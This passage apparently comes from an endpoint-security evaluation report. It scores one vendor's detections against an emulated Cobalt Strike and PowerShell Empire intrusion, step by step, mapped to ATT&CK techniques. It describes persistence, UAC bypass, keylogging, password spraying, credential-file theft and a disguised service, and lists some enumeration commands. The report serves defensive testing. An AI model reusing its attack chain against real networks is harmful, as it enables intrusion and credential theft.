Telemetry showing hook injection from explorer.exe (does not count as a detection)
Application Window Discovery
(T1010)
None
No detection capability demonstrated for this procedure.
8.D.1
Cobalt Strike: Built-in screen capture capability executed to capture screenshot of current window of user Debbie
Screen Capture
(T1113)
Enrichment
The capability enriched the execution of a specific API call as information gathering using screen capture and suspicious activity.
Enrichment of the execution of a specific API call using screen capture and suspicious activity
Process Injection
(T1055)
Enrichment
The capability enriched cmd.exe injecting into explorer.exe as code injection via CreateThread.
Enrichment of cmd.exe injecting into explorer.exe as code injection via CreateThread
9.A.1
Cobalt Strike: 'ls' (List) via Win32 APIs to enumerate a network shared drive (Wormshare) on Conficker (10.0.0.5)
File and Directory Discovery
(T1083)
None
No detection capability demonstrated for this procedure. Vendor stated that more information would be available if their firewall appliance was installed and activated.
9.B.1
Cobalt Strike: Built-in download capability executed to collect a file (Shockwave_rackb_diagram.vsdx) from a network shared drive (Wormshare) on Conficker (10.0.0.5)
Data from Network Shared Drive
(T1039)
Telemetry
Telemetry showed a file read event for the .vsdx file from the network shared drive. Vendor stated that more information would be available if their firewall appliance was installed and activated.
Telemetry showing a file read event for the .vsdx file from the network shared drive
Exfiltration Over Command and Control Channel
(T1041)
None
No detection capability demonstrated for this procedure, though port 53 network traffic to/from freegoogleadsenseinfo.com (C2 domain) was observed. Vendor stated that more information would be available if their firewall appliance was installed and activated.
Port 53 network traffic to/from freegoogleadsenseinfo.com (C2 domain) (does not count as a detection)
10.A.1
Batch file (autoupdate.bat) previously written to Startup folder executed when user Debbie logs on to Nimda (10.0.1.6), launching a DLL payload (update.dat) using Rundll32
Registry Run Keys / Startup Folder
(T1060)
Telemetry
Telemetry showed cmd.exe executing autoupdate.bat from the Startup folder.
Telemetry showing cmd.exe executing autoupdate.bat from the Startup folder
10.A.2
Scheduled task executed when user Debbie logs on to Nimda (10.0.1.6), launching a DLL payload (updater.dll) using Rundll32
Scheduled Task
(T1053)
Telemetry
Telemetry showed the execution sequence for rundll32.exe executing updater.dll with a parent of svchost.exe running with command-line arguments "-k netsvcs -p -s Schedule".
Telemetry showing svchost.exe running with command-line arguments "-k netsvcs -p -s Schedule"
Telemetry showing rundll32.exe executing updater.dll
10.B.1
RDP connection to Conficker (10.0.0.5) authenticated using previously added user Jesse
Remote Desktop Protocol
(T1076)
Telemetry
Telemetry showed a successful incoming connection to Conficker (10.0.0.5) over port 3389.
Enrichment
The capability enriched the network connection over port 3389 with the correct ATT&CK Technique (Remote Desktop Protocol).
Telemetry showed a successful incoming connection to Conficker (10.0.0.5) over port 3389
Enrichment of the network connection over port 3389 with the correct ATT&CK Technique (Remote Desktop Protocol)
Valid Accounts
(T1078)
Telemetry
Telemetry showed userinit.exe as well as explorer.exe spawning as the user Jesse.
Telemetry showing userinit.exe as well as explorer.exe spawning as the user Jesse
11.A.1
Legitimate user Bob clicked and executed malicious VBScript (autoupdate.vbs) on 10.0.1.5 (CodeRed)
Scripting
(T1064)
Specific Behavior
A Specific Behavior alert was generated for the execution of the Windows script engine. The alert was tagged with the correct ATT&CK Technique (Scripting).
Specific Behavior
A Specific Behavior alert was generated for PowerShell execution. The alert was tagged with a related Technique (PowerShell).
Specific Behavior
A Specific Behavior alert was generated for suspicious PowerShell activity.
Indicator of Compromise
Indicator of Compromise alerts were generated for suspicious PowerShell strings.
Indicator of Compromise
An Indicator of Compromise alert was generated identifying PowerShell Empire.
Specific Behavior
A Specific Behavior alert was generated for PowerShell execution with base64 encoded commands.
Telemetry (Tainted)
Telemetry showed wscript.exe executing autoupdate.vbs as well as the resulting powershell.exe execution. The telemetry was tainted by a parent alert on wscript.exe.
Specific Behavior alert for execution of the Windows script engine tagged with the correct ATT&CK Technique (Scripting)
Specific Behavior alert for PowerShell (execution) tagged with a related Technique (PowerShell)
Specific Behavior alert for suspicious PowerShell activity
Indicator of Compromise alerts for suspicious PowerShell strings
Indicator of Compromise alert identifying PowerShell Empire
Specific Behavior alert for PowerShell execution with base64 encoded commands
Telemetry showing wscript.exe executing autoupdate.vbs (tainted by a parent alert on wscript.exe)
Telemetry showing powershell.exe running with command-line arguments (tainted by a parent alert on wscript.exe)
11.B.1
Empire: C2 channel established
Commonly Used Port
(T1043)
Telemetry (Tainted)
Telemetry showed port 443 network connections to www.freegoogleadsenseinfo.com (C2 domain). The telemetry was tainted by a parent alert on wscript.exe. Vendor stated that more information would be available if their firewall appliance was installed and activated.
Enrichment (Tainted)
The capability enriched the port 443 network connection with the correct ATT&CK Technique (Commonly Used Port). The data was tainted by a parent alert on wscript.exe. Vendor stated that more information would be available if their firewall appliance was installed and activated.
General Behavior (Tainted)
General Behavior alerts were generated for PowerShell making network connections to the internet as well as Wscript connecting to an external network. The alerts were tainted by a parent alert on wscript.exe. Vendor stated that more information would be available if their firewall appliance was installed and activated.
Telemetry showing port 443 network connections to www.freegoogleadsenseinfo.com (C2 domain) (tainted by a parent alert on wscript.exe)
Enrichment of the port 443 network connection with the correct ATT&CK Technique (Commonly Used Port) (tainted by a parent alert on wscript.exe)
General Behavior alerts for PowerShell making network connections to the internet as well as Wscript connecting to an external network (tainted by a parent alert on wscript.exe)
Standard Application Layer Protocol
(T1071)
None
No detection capability demonstrated for this procedure. Vendor stated that more information would be available if their firewall appliance was installed and activated.
Standard Cryptographic Protocol
(T1032)
None
No detection capability demonstrated for this procedure. Vendor stated that more information would be available if their firewall appliance was installed and activated.
12.A.1
Empire: 'route print' via PowerShell
System Network Configuration Discovery
(T1016)
Telemetry (Tainted)
Telemetry showed powershell.exe executing route.exe with command-line arguments. The telemetry was tainted by a parent alert on wscript.exe.
Enrichment
The capability enriched route.exe executing with the correct ATT&CK Technique (System Network Configuration Discovery).
Telemetry showing powershell.exe executing route.exe with command-line arguments (tainted by a parent alert on wscript.exe)
Enrichment of route.exe executing with the correct ATT&CK Technique (System Network Configuration Discovery)
12.A.2
Empire: 'ipconfig /all' via PowerShell
System Network Configuration Discovery
(T1016)
Telemetry (Tainted)
Telemetry showed powershell.exe executing ipconfig.exe with command-line arguments. The telemetry was tainted by a parent alert on wscript.exe.
Enrichment
The capability enriched ipconfig.exe executing with the correct ATT&CK Technique (System Network Configuration Discovery).
Telemetry showing powershell.exe executing ipconfig.exe with command-line arguments (tainted by a parent alert on wscript.exe)
Enrichment of ipconfig.exe executing with the correct ATT&CK Technique (System Network Configuration Discovery)
12.B.1
Empire: 'whoami /all /fo list' via PowerShell
System Owner / User Discovery
(T1033)
Telemetry (Tainted)
Telemetry showed powershell.exe executing whoami.exe with command-line arguments. The telemetry was tainted by a parent alert on wscript.exe.
Telemetry showing powershell.exe executing whoami.exe with command-line arguments (tainted by a parent alert on wscript.exe)
12.C.1
Empire: 'qprocess *' via PowerShell
Process Discovery
(T1057)
Telemetry (Tainted)
Telemetry showed powershell.exe executing qprocess.exe with command-line arguments. The telemetry was tainted by a parent alert on wscript.exe.
Enrichment (Tainted)
The capability enriched the execution of qprocess.exe as the enumeration of running processes via the command line. The data was tainted by a parent alert on wscript.exe.
Enrichment
The capability enriched qprocess.exe executing with a related ATT&CK Technique (System Service Discovery).
Telemetry showing powershell.exe executing qprocess.exe with command-line arguments (tainted by a parent alert on wscript.exe)
Enrichment of execution of qprocess.exe as the enumeration of running processes via the command line (tainted by a parent alert on wscript.exe)
Enrichment of qprocess.exe executing with a related ATT&CK Technique (System Service Discovery)
12.D.1
Empire: 'net start' via PowerShell
System Service Discovery
(T1007)
Telemetry (Tainted)
Telemetry showed powershell.exe executing net.exe with command-line arguments. The telemetry was tainted by a parent alert on wscript.exe.
Enrichment (Tainted)
The capability enriched net.exe executing as the execution of an enumeration command. The data was tainted by a parent alert on wscript.exe.
General Behavior (Tainted)
A General Behavior alert was generated for net.exe executing as an enumeration command called by a commonly abused causality group owner (CGO, wscript.exe). The data was tainted by a parent alert on wscript.exe.
Telemetry showing powershell.exe executing net.exe with command-line arguments (tainted by a parent alert on wscript.exe)
Enrichment of net.exe executing as the execution of an enumeration command (tainted by a parent alert on wscript.exe)
General Behavior alert for net.exe executing as an enumeration command called by a commonly abused causality group owner (CGO, wscript.exe) (tainted by a parent alert on wscript.exe)
12.E.1
Empire: Built-in WinEnum module executed to programmatically execute a series of enumeration techniques
Scripting
(T1064)
Telemetry (Tainted)
Telemetry showed powershell.exe executing with command-line arguments as well as PowerShell module (.psm) and script (.ps1) files being written to disk. The telemetry was tainted by a parent alert on wscript.exe.
Specific Behavior (Tainted)
A Specific Behavior alert was generated for PowerShell execution with base64 encoded commands. The alert was tainted by a parent alert on wscript.exe.
Indicator of Compromise
An Indicator of Compromise alert was generated identifying suspicious PowerShell strings as Empire WinEnum.
Telemetry showing powershell.exe executing with command-line arguments as well as PowerShell module (.psm) and script (.ps1) files being written to disk (tainted by a parent alert on wscript.exe)
Specific Behavior alert for PowerShell execution with base64 encoded commands (tainted by a parent alert on wscript.exe)
Indicator of Compromise alert identifying suspicious PowerShell strings as Empire WinEnum
12.E.1.1
Empire: WinEnum module included enumeration of user information
System Owner / User Discovery
(T1033)
Indicator of Compromise
An Indicator of Compromise alert was generated identifying suspicious PowerShell strings as Empire UserInfo.
Indicator of Compromise alert identifying suspicious PowerShell strings as Empire UserInfo
12.E.1.2
Empire: WinEnum module included enumeration of AD group memberships
Permission Groups Discovery
(T1069)
None
No detection capability demonstrated for this procedure.
12.E.1.3
Empire: WinEnum module included enumeration of password policy information
Password Policy Discovery
(T1201)
None
No detection capability demonstrated for this procedure.
12.E.1.4.1
Empire: WinEnum module included enumeration of recently opened files
File and Directory Discovery
(T1083)
Enrichment
The capability enriched powershell.exe executing with command-line arguments as suspicious and the correct ATT&CK Technique (File and Directory Discovery).
Enrichment of powershell.exe executing with command-line arguments as suspicious and the correct ATT&CK Technique (File and Directory Discovery)
12.E.1.4.2
Empire: WinEnum module included enumeration of interesting files
File and Directory Discovery
(T1083)
Enrichment
The capability enriched powershell.exe executing with command-line arguments as suspicious and the correct ATT&CK Technique (File and Directory Discovery).
Enrichment of powershell.exe executing with command-line arguments as suspicious and the correct ATT&CK Technique (File and Directory Discovery)
12.E.1.5
Empire: WinEnum module included enumeration of clipboard contents
Clipboard Data
(T1115)
Enrichment
The capability enriched powershell.exe executing with command-line arguments with the correct ATT&CK Technique (Clipboard Data).
Enrichment of powershell.exe executing with command-line arguments with the correct ATT&CK Technique (Clipboard Data)
12.E.1.6.1
Empire: WinEnum module included enumeration of system information
System Information Discovery
(T1082)
Indicator of Compromise
An Indicator of Compromise alert was generated identifying suspicious PowerShell strings as Empire SysInfo.
Indicator of Compromise alert identifying suspicious PowerShell strings as Empire SysInfo
12.E.1.6.2
Empire: WinEnum module included enumeration of Windows update information
System Information Discovery
(T1082)
None
No detection capability demonstrated for this procedure.
12.E.1.7
Empire: WinEnum module included enumeration of system information via a Registry query
Query Registry
(T1012)
Enrichment (Tainted)
The capability enriched the enumeration of system information via a Registry query as suspicious. The data was tainted by a parent alert on wscript.exe.
Indicator of Compromise
An Indicator of Compromise alert was generated identifying suspicious PowerShell strings as Empire SysInfo.
Enrichment of the enumeration of system information via a Registry query as suspicious (tainted by a parent alert on wscript.exe)
Indicator of Compromise alert identifying suspicious PowerShell strings as Empire SysInfo
12.E.1.8
Empire: WinEnum module included enumeration of services
System Service Discovery
(T1007)
Enrichment
The capability enriched powershell.exe executing with command-line arguments with the correct ATT&CK Technique (System Service Discovery).
Enrichment of powershell.exe executing with command-line arguments with the correct ATT&CK Technique (System Service Discovery)
12.E.1.9.1
Empire: WinEnum module included enumeration of available shares
Network Share Discovery
(T1135)
Enrichment
The capability enriched powershell.exe executing with command-line arguments with the correct ATT&CK Technique (Network Share Discovery).
Enrichment of powershell.exe executing with command-line arguments with the correct ATT&CK Technique (Network Share Discovery)
12.E.1.9.2
Empire: WinEnum module included enumeration of mapped network drives
Network Share Discovery
(T1135)
Enrichment
The capability enriched powershell.exe executing with command-line arguments with the correct ATT&CK Technique (Network Share Discovery).
Enrichment of powershell.exe executing with command-line arguments with the correct ATT&CK Technique (Network Share Discovery)
12.E.1.10.1
Empire: WinEnum module included enumeration of AV solutions
Security Software Discovery
(T1063)
Telemetry
Telemetry showed an event log for the WMI query of the system AV products.
Telemetry showing an event log for the WMI query of the system AV products
12.E.1.10.2
Empire: WinEnum module included enumeration of firewall rules
Security Software Discovery
(T1063)
Enrichment
The capability enriched powershell.exe executing with command-line arguments with the correct ATT&CK Technique (Security Software Discovery).
Enrichment of powershell.exe executing with command-line arguments with the correct ATT&CK Technique (Security Software Discovery)
12.E.1.11
Empire: WinEnum module included enumeration of network adapters
System Network Configuration Discovery
(T1016)
Indicator of Compromise
An Indicator of Compromise alert was generated identifying suspicious PowerShell strings as Empire NetInfo.
Indicator of Compromise alert identifying suspicious PowerShell strings as Empire NetInfo
12.E.1.12
Empire: WinEnum module included enumeration of established network connections
System Network Connections Discovery
(T1049)
Enrichment
The capability enriched powershell.exe executing with command-line arguments with the correct ATT&CK Technique (System Network Connections Discovery).
Enrichment of powershell.exe executing with command-line arguments with the correct ATT&CK Technique (System Network Connections Discovery)
12.F.1
Empire: 'net group "Domain Admins" /domain' via PowerShell
Permission Groups Discovery
(T1069)
Telemetry (Tainted)
Telemetry showed powershell.exe executing net with command-line arguments. The telemetry was tainted by a parent alert on wscript.exe.
Enrichment (Tainted)
The capability enriched the execution of net.exe and net1.exe as the possible enumeration of administrator groups. The data was tainted by a parent alert on wscript.exe.
Enrichment (Tainted)
The capability enriched the execution of net.exe and net1.exe as an enumeration command. The data was tainted by a parent alert on wscript.exe.
Enrichment
The capability enriched net.exe executing with command-line arguments with the correct ATT&CK Technique (Permission Groups Discovery).
Telemetry showing powershell.exe executing net with command-line arguments (tainted by a parent alert on wscript.exe)
Enrichment of the execution of net.exe and net1.exe as the possible enumeration of administrator groups (tainted by a parent alert on wscript.exe)
Enrichment of the execution of net.exe and net1.exe as an enumeration command (tainted by a parent alert on wscript.exe)
Enrichment of net.exe executing with command-line arguments with the correct ATT&CK Technique (Permission Groups Discovery)
12.F.2
Empire: 'net localgroup administrators' via PowerShell
Permission Groups Discovery
(T1069)
Telemetry (Tainted)
Telemetry showed powershell.exe executing net with command-line arguments. The telemetry was tainted by a parent alert on wscript.exe.
Enrichment (Tainted)
The capability enriched the execution of net.exe and net1.exe as the possible enumeration of administrator groups. The data was tainted by a parent alert on wscript.exe.
Enrichment
The capability enriched net.exe executing with command-line arguments with the correct ATT&CK Technique (Permission Groups Discovery).
Telemetry showing powershell.exe executing net with command-line arguments (tainted by a parent alert on wscript.exe)
Enrichment of the execution of net.exe and net1.exe as the possible enumeration of administrator groups (tainted by a parent alert on wscript.exe)
Enrichment of net.exe executing with command-line arguments with the correct ATT&CK Technique (Permission Groups Discovery)
12.G.1
Empire: 'net user' via PowerShell
Account Discovery
(T1087)
Telemetry (Tainted)
Telemetry showed powershell.exe executing net with command-line arguments. The telemetry was tainted by a parent alert on wscript.exe.
Enrichment
The capability enriched net.exe executing with command-line arguments with the correct ATT&CK Technique (Account Discovery).
Telemetry showing powershell.exe executing net with command-line arguments (tainted by a parent alert on wscript.exe)
Enrichment of net.exe executing with command-line arguments with the correct ATT&CK Technique (Account Discovery)
12.G.2
Empire: 'net user /domain' via PowerShell
Account Discovery
(T1087)
Telemetry (Tainted)
Telemetry showed powershell.exe executing net with command-line arguments. The telemetry was tainted by a parent alert on wscript.exe.
Enrichment
The capability enriched net.exe executing with command-line arguments with the correct ATT&CK Technique (Account Discovery).
Telemetry showing powershell.exe executing net with command-line arguments (tainted by a parent alert on wscript.exe)
Enrichment of net.exe executing with command-line arguments with the correct ATT&CK Technique (Account Discovery)
13.A.1
Empire: 'net group "Domain Computers" /domain' via PowerShell
Remote System Discovery
(T1018)
Telemetry (Tainted)
Telemetry showed powershell.exe executing net with command-line arguments. The telemetry was tainted by a parent alert on wscript.exe.
Enrichment (Tainted)
The capability enriched the execution of net.exe and net1.exe as an enumeration command. The data was tainted by a parent alert on wscript.exe.
Telemetry showing powershell.exe executing net with command-line arguments (tainted by a parent alert on wscript.exe)
Enrichment of the execution of net.exe and net1.exe as an enumeration command (tainted by a parent alert on wscript.exe)
13.B.1
Empire: 'net use' via PowerShell
System Network Connections Discovery
(T1049)
Telemetry (Tainted)
Telemetry showed powershell.exe executing net with command-line arguments. The telemetry was tainted by a parent alert on wscript.exe.
Telemetry showing powershell.exe executing net with command-line arguments (tainted by a parent alert on wscript.exe)
13.B.2
Empire: 'netstat -ano' via PowerShell
System Network Connections Discovery
(T1049)
Telemetry (Tainted)
Telemetry showed powershell.exe executing netstat with command-line arguments. The telemetry was tainted by a parent alert on wscript.exe.
Telemetry showing powershell.exe executing netstat with command-line arguments (tainted by a parent alert on wscript.exe)
13.C.1
Empire: 'reg query' via PowerShell to enumerate a specific Registry key
Query Registry
(T1012)
Telemetry (Tainted)
Telemetry showed powershell.exe executing reg with command-line arguments. The telemetry was tainted by a parent alert on wscript.exe.
Enrichment
The capability enriched reg.exe executing with command-line arguments with the correct ATT&CK Technique (Query Registry).
Telemetry showing powershell.exe executing reg with command-line arguments (tainted by a parent alert on wscript.exe)
Enrichment of reg.exe executing with command-line arguments with the correct ATT&CK Technique (Query Registry)
14.A.1
Empire: UAC bypass module downloaded and executed a new Empire stager (wdbypass)
Bypass User Account Control
(T1088)
Telemetry
Telemetry showed a process integrity level change from parent powershell.exe (medium / 8192) to child powershell.exe (high / 12288).
Indicator of Compromise
An Indicator of Compromise alert was generated identifying a PowerShell Empire script performing the bypass UAC attack.
Telemetry showing powershell.exe running as medium integrity level (8192)
Telemetry showing powershell.exe running as high integrity level (12288)
Indicator of Compromise alert identifying a PowerShell Empire script performing the bypass UAC attack
Commonly Used Port
(T1043)
Telemetry
Telemetry showed an outgoing network connection to www.freegoogleadsenseinfo.com (C2 domain) over port 8080.
Telemetry showing an outgoing network connection to www.freegoogleadsenseinfo.com (C2 domain) over port 8080
Remote File Copy
(T1105)
None
No detection capability demonstrated for this procedure, though telemetry showed an encoded PowerShell command that could be decoded outside the capability to show the IEX command used to download the file (wdbypass) over HTTP port 8080.
Telemetry showing decoded PowerShell showing download request over HTTP (does not count as a detection due to decoding outside of capability)
Standard Application Layer Protocol
(T1071)
None
No detection capability demonstrated for this procedure, though telemetry showed an encoded PowerShell command that could be decoded outside the capability to show the IEX command used to download the file (wdbypass) over HTTP port 8080.
Telemetry showing decoded PowerShell showing download request over HTTP (does not count as a detection due to decoding outside of capability)
15.A.1
Empire: Built-in keylogging module executed to capture keystrokes of user Bob
Application Window Discovery
(T1010)
Telemetry
Telemetry showed the decoded PowerShell script, which includes the API call GetForegroundWindow to enumerate the active window.
Indicator of Compromise
An Indicator of Compromise alert was generated identifying a PowerShell Empire script logging keys pressed, time, and the active window.
Telemetry showing decoded PowerShell script containing the API call GetForegroundWindow
Indicator of Compromise alert identifying a PowerShell Empire script logging keys pressed, time, and the active window
Input Capture
(T1056)
Enrichment
The capability enriched the execution of a specific API call as keylogging and suspicious activity.
Indicator of Compromise
An Indicator of Compromise alert was generated identifying a PowerShell Empire script logging keys pressed, time, and the active window.
Enrichment of the execution of a specific API call as keylogging and suspicious activity
Indicator of Compromise alert identifying a PowerShell Empire script logging keys pressed, time, and the active window
15.B.1
Empire: 'get-content' via PowerShell to collect sensitive file (it_tasks.txt) from a network shared drive (Wormshare) on Conficker (10.0.0.5)
Credentials in Files
(T1081)
Telemetry
Telemetry showed a file read event for IT_tasks.txt.
Telemetry showing a file read event for IT_tasks.txt
16.A.1
Empire: 'net use' via PowerShell to brute force authentication (password spraying attempts) to Morris (10.0.1.4) and Nimda (10.0.1.6) targeting credentials of users Kmitnick, Bob, and Frieda
Brute Force
(T1110)
Telemetry (Tainted)
Telemetry showed repeated logon attempts via net.exe and command-line arguments indicative of password spraying. The telemetry was tainted by a parent alert on wscript.exe.
General Behavior
A General Behavior alert was generated for sensitive administrative shares mapping with unexpected parent.
Telemetry showing net.exe logon attempt to ADMIN$ on 10.0.1.4 (Morris) as local user Kmitnick (tainted by a parent alert on wscript.exe)
Telemetry showing net.exe logon attempt to ADMIN$ on 10.0.1.6 (Nimda) as domain user Frieda (tainted by a parent alert on wscript.exe)
Telemetry showing net.exe logon attempt to ADMIN$ on 10.0.1.6 (Nimda) as domain user Bob (tainted by a parent alert on wscript.exe)
General Behavior alert for a sensitive administrative shares mapping with unexpected parent
Windows Admin Shares
(T1077)
Telemetry (Tainted)
Telemetry showed repeated logon attempts via net.exe and command-line arguments indicative of password spraying. The telemetry was tainted by a parent alert on wscript.exe.
Specific Behavior
A Specific Behavior alert was generated for a net.exe logon attempt to ADMIN$. The alert was tagged with the correct ATT&CK Technique (Windows Admin Shares).
Telemetry showing net.exe logon attempt to ADMIN$ on 10.0.1.4 (Morris) as local user Kmitnick (tainted by a parent alert on wscript.exe)
Telemetry showing net.exe logon attempt to ADMIN$ on 10.0.1.6 (Nimda) as domain user Frieda (tainted by a parent alert on wscript.exe)
Telemetry showing net.exe logon attempt to ADMIN$ on 10.0.1.6 (Nimda) as domain user Bob (tainted by a parent alert on wscript.exe)
Specific Behavior alert for a net.exe logon attempt to ADMIN$ tagged with the correct ATT&CK Technique (Windows Admin Shares)
16.B.1
Empire: 'net use' via PowerShell to successfully authenticate to Conficker (10.0.0.5) using credentials of user Kmitnick
Windows Admin Shares
(T1077)
Telemetry (Tainted)
Telemetry showed a net.exe logon attempt to ADMIN$ on 10.0.0.5 (Conficker) as local user Kmitnick. The telemetry was tainted by a parent alert on wscript.exe.
Telemetry showing a net.exe logon attempt to ADMIN$ on 10.0.0.5 (Conficker) as local user Kmitnick (tainted by a parent alert on wscript.exe)
Valid Accounts
(T1078)
Telemetry (Tainted)
Telemetry showed a net.exe logon attempt to ADMIN$ on 10.0.0.5 (Conficker) using valid credentials for user Kmitnick followed by an event for the credentials being validated by the DC. The telemetry was tainted by a parent alert on wscript.exe.
Enrichment
The capability enriched an lsass.exe event with the correct ATT&CK Technique (Valid Accounts).
Telemetry showing a net.exe logon attempt to ADMIN$ on 10.0.0.5 (Conficker) using valid credentials for user Kmitnick (tainted by a parent alert on wscript.exe)
Telemetry showing an event for the logon credentials being validated by the DC (tainted by a parent alert on wscript.exe)
Enrichment of an lsass.exe event with the correct ATT&CK Technique (Valid Accounts)
Brute Force
(T1110)
Telemetry (Tainted)
Telemetry showed a net.exe logon attempt to ADMIN$ on 10.0.0.5 (Conficker) as local user Kmitnick followed by an event for the credentials being validated by the DC. The telemetry was tainted by a parent alert on wscript.exe.
Telemetry showing a net.exe logon attempt to ADMIN$ on 10.0.0.5 (Conficker) as local user Kmitnick (tainted by a parent alert on wscript.exe)
Telemetry showing an event for the logon credentials being validated by the DC (tainted by a parent alert on wscript.exe)
16.C.1
Empire: 'net use /delete' via PowerShell
Network Share Connection Removal
(T1126)
Telemetry (Tainted)
Telemetry showed powershell.exe executing net with command-line arguments. The telemetry was tainted by a parent alert on wscript.exe.
Enrichment
The capability enriched net.exe executing with command-line arguments with the correct ATT&CK Technique (Network Share Connection Removal).
Telemetry showing powershell.exe executing net with command-line arguments (tainted by a parent alert on wscript.exe)
Enrichment of net.exe executing with command-line arguments with the correct ATT&CK Technique (Network Share Connection Removal)
16.D.1
Empire: Successful authentication targeted Windows admin shares on Conficker (10.0.0.5)
Windows Admin Shares
(T1077)
Telemetry (Tainted)
Telemetry showed a net.exe logon attempt to C$ on 10.0.0.4 (Creeper) using valid credentials for user Kmitnick. The telemetry was tainted by a parent alert on wscript.exe.
Telemetry showing a net.exe logon attempt to C$ on 10.0.0.4 (Creeper) using valid credentials for user Kmitnick (tainted by a parent alert on wscript.exe)
Valid Accounts
(T1078)
Telemetry (Tainted)
Telemetry showed a net.exe logon attempt to C$ on 10.0.0.4 (Creeper) using valid credentials for user Kmitnick followed by an event for a successful login. The telemetry was tainted by a parent alert on wscript.exe.
Telemetry showing a net.exe logon attempt to C$ on 10.0.0.4 (Creeper) using valid credentials for user Kmitnick (tainted by a parent alert on wscript.exe)
Telemetry showing an event for a successful login by user Kmitnick (tainted by a parent alert on wscript.exe)
16.E.1
Empire: Built-in upload module executed to write malicious VBScript (autoupdate.vbs) to disk on CodeRed (10.0.1.5)
Remote File Copy
(T1105)
Telemetry
Telemetry showed file create and write events for autoupdate.vbs.
Telemetry showing file create and write events for autoupdate.vbs
16.F.1
Empire: Built-in runas module executed to launch malicious VBScript (autoupdate.vbs) as user Kmitnick
Command-Line Interface
(T1059)
Telemetry (Tainted)
Telemetry showed cmd.exe executing autoupdate.vbs. The telemetry was tainted by a parent alert on wscript.exe.
Enrichment
The capability enriched wscript.exe executing autoupdate.vbs with a related ATT&CK Technique (Scripting).
Indicator of Compromise
An Indicator of Compromise alert was generated identifying PowerShell Empire using the Runas functionality.
Telemetry showing cmd.exe executing autoupdate.vbs (tainted by a parent alert on wscript.exe)
Enrichment of wscript.exe executing autoupdate.vbs with a related ATT&CK Technique (Scripting)
Indicator of Compromise alert identifying PowerShell Empire using the Runas functionality
16.G.1
Empire: Built-in move capability executed to write malicious VBScript (update.vbs) to disk on Creeper (10.0.0.4)
Remote File Copy
(T1105)
Telemetry
Telemetry showed file create and write events for update.vbs.
Specific Behavior (Tainted)
A Specific Behavior alert was generated for a script being modified/moved to a remote location. The alert was tainted by a parent alert on wscript.exe.
Telemetry showing file create and write events for update.vbs
Specific Behavior alert for a script being modified/moved to a remote location (tainted by a parent alert on wscript.exe)
16.H.1
Empire: 'sc query' via PowerShell to remotely enumerate services on Creeper (10.0.0.4)
System Service Discovery
(T1007)
Telemetry (Tainted)
Telemetry showed powershell.exe executing sc with command-line arguments. The telemetry was tainted by a parent alert on wscript.exe.
General Behavior (Tainted)
A General Behavior alert was generated for the sc utility being used to perform actions on remote services. The alert was tainted by a parent alert on wscript.exe.
Enrichment
The capability enriched sc.exe executing with command-line arguments with the correct ATT&CK Technique (System Service Discovery).
Telemetry showing powershell.exe executing sc with command-line arguments (tainted by a parent alert on wscript.exe)
General Behavior alert for the sc utility being used to perform actions on remote services (tainted by a parent alert on wscript.exe)
Enrichment of sc.exe executing with command-line arguments with the correct ATT&CK Technique (System Service Discovery)
16.I.1
Empire: 'sc create' via PowerShell to remotely create a service on Creeper (10.0.0.4)
New Service
(T1050)
Telemetry (Tainted)
Telemetry showed execution of sc.exe with command-line arguments to create a new AdobeUpdater service containing a binPath pointed to cmd.exe with arguments to execute update.vbs. Telemetry also showed the creation of Registry keys associated with this new service. The telemetry was tainted by a parent alert on wscript.exe.
Specific Behavior (Tainted)
A Specific Behavior alert was generated for a new service created via the command line. The alert was tainted by a parent alert on wscript.exe.
Enrichment
The capability enriched sc.exe executing with the correct ATT&CK Technique (New Service).
Telemetry showing execution of sc.exe to create a new AdobeUpdater service (tainted by a parent alert on wscript.exe)
Telemetry showing the creation of Registry keys associated with the AdobeUpdater service
Specific Behavior alert for a new service created via the command line (tainted by a parent alert on wscript.exe)
Enrichment of sc.exe executing with the correct ATT&CK Technique (New Service)
Masquerading
(T1036)
Telemetry (Tainted)
Telemetry showed execution of sc.exe with command-line arguments to set the service description. An analyst could use this information to determine it is not a legitimate service. The telemetry was tainted by a parent alert on wscript.exe.
Telemetry showing execution of sc.exe with command-line arguments (tainted by a parent alert on wscript.exe)
16.J.1
Empire: 'sc qc' via PowerShell to remotely enumerate a specific service on Creeper (10.0.0.4)
System Service Discovery
(T1007)
Telemetry (Tainted)
Telemetry showed powershell.exe executing sc.exe with command-line arguments. The telemetry was tainted by a parent alert on wscript.exe.
Enrichment (Tainted)
The capability enriched powershell.exe executing sc.exe as enumeration of services via the command line. The data was tainted by a parent alert on wscript.exe.
Telemetry showing powershell.exe executing sc.exe with command-line arguments (tainted by a parent alert on wscript.exe)
Enrichment of powershell.exe executing sc.exe as enumeration of services via the command line (tainted by a parent alert on wscript.exe)
16.K.1
Empire: 'type' via PowerShell to remotely enumerate a specific file (update.vbs) on Creeper (10.0.0.4)
File and Directory Discovery
(T1083)
Telemetry (Tainted)
Telemetry showed a file read event for update.vbs. The telemetry was tainted by a parent alert on wscript.exe. The process tree showing taintedness is visible within the same UI but did not fit within the current frame.
Telemetry showing a file read event for update.vbs (tainted by a parent alert on wscript.exe)
16.L.1
Empire: 'sc start' via PowerShell to remotely launch a specific service on Creeper (10.0.0.4)
Service Execution
(T1035)
Telemetry (Tainted)
Telemetry showed powershell.exe executing sc with command-line arguments. As part of the service, telemetry also showed cmd.exe executing update.vbs on 10.0.0.4 (Creeper). The telemetry was tainted by a parent alert on wscript.exe.
Enrichment
The capability enriched sc.exe executing with command-line arguments with the correct ATT&CK Technique (Service Execution).
Telemetry showing powershell.exe executing sc with command-line arguments (tainted by a parent alert on wscript.exe)
Telemetry showing cmd.exe executing update.vbs on 10.0.0.4 (Creeper)
Enrichment of sc.exe executing with command-line arguments with the correct ATT&CK Technique (Service Execution)
17.A.1
Empire: 'reg query' via PowerShell to enumerate a specific Registry key associated with terminal services
System Service Discovery
(T1007)
Telemetry (Tainted)
Telemetry showed powershell.exe executing reg with command-line arguments. The telemetry was tainted by a parent alert on cmd.exe.
Enrichment (Tainted)
The capability enriched reg.exe executing with command-line arguments as the terminal server key queried by the reg utility. The data was tainted by a parent alert on cmd.exe.
Enrichment
The capability enriched reg.exe executing with command-line arguments with the correct ATT&CK Technique (System Service Discovery).
Telemetry showing powershell.exe executing reg with command-line arguments (tainted by a parent alert on cmd.exe)
Enrichment of reg.exe executing with command-line arguments as the terminal server key queried by the reg utility (tainted by a parent alert on cmd.exe)
Enrichment of reg.exe executing with command-line arguments with the correct ATT&CK Technique (System Service Discovery)
Query Registry
(T1012)
Telemetry (Tainted)
Telemetry showed powershell.exe executing reg with command-line arguments to check if terminal services were enabled. The telemetry was tainted by a parent alert on cmd.exe.
Enrichment (Tainted)
